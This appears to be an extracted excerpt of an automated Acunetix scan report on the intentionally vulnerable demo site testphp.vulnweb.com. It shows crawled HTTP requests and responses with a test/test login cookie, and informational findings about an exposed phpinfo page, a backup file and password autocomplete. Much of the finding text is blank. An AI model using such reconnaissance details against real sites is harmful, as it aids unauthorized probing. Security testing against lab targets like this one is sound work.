Request GET /cart.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /categories.php Details

Request GET /categories.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /disclaimer.php Details

Acunetix Website Audit

257

Request GET /disclaimer.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 40 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/guestbook.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request GET /guestbook.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

258

Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /index.bak Details

Request GET /index.bak HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:42 GMT Content-Type: text/plain Content-Length: 3265 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-cc1" Accept-Ranges: bytes /index.php Details

Request GET /index.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

259

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist=2 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?artist=3 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Acunetix Website Audit

260

Connection: close /listproducts.php Details

Request GET /listproducts.php?artist=1 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?cat=2 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/categories.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Acunetix Website Audit

261

Request GET /listproducts.php?cat=3 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/categories.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?cat=4 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/categories.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php?cat=1 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix Website Audit

262

Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/categories.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Request GET /listproducts.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/categories.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /login.php Details

Request GET /login.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close Acunetix Website Audit

263

/logout.php Details

Request GET /logout.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/userinfo.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Set-Cookie: login=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT /product.php Details

Request GET /product.php?pic=4 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

264

/product.php Details

Request GET /product.php?pic=5 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=2 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=3 HTTP/1.0 Acunetix Website Audit

265

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=1 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix Website Audit

266

Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=7 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=6 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Acunetix Website Audit

267

Content-Type: text/html Connection: close /search.php Details

Request GET /search.php?test=query HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 22 Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

268

/secured/phpinfo.php Details

Request GET /secured/phpinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /signup.php Details

Request GET /signup.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /userinfo.php Details

Acunetix Website Audit

269

Request POST /userinfo.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 158 Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/userinfo.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /userinfo.php Details

Request POST /userinfo.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 20 Connection: Close Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Set-Cookie: login=test%2Ftest /userinfo.php Details

Request GET /userinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix Website Audit

270

Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/userinfo.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

GHDB: Default phpinfo page Severity Informational Type Informational Reported by module GHDB - Google hacking database Description

Impact

Recommendation

Affected items /secured/phpinfo.php Details

Request GET /secured/phpinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

271

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

GHDB: phpinfo() Severity Informational Type Informational Reported by module GHDB - Google hacking database Description

Impact

Recommendation

Affected items /secured/phpinfo.php Details

Request GET /secured/phpinfo.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:50 GMT Content-Type: text/html Connection: close Acunetix Website Audit

272

Password type input with autocomplete enabled Severity Informational Type Informational Reported by module Crawler Description

Impact

Recommendation

Affected items /login.php Details Request GET /login.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /signup.php Details

Request GET /signup.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix Website Audit

273

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /signup.php Details

Request GET /signup.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

274

Detailed Report - WVSSingleScan.pdf

Page 1 of 274. Acunetix Website Audit. 13 October, 2017. Detailed Scan Report. Generated by Acunetix WVS Reporter (v6.0 Build 20081124). Page 1 of 274 ...

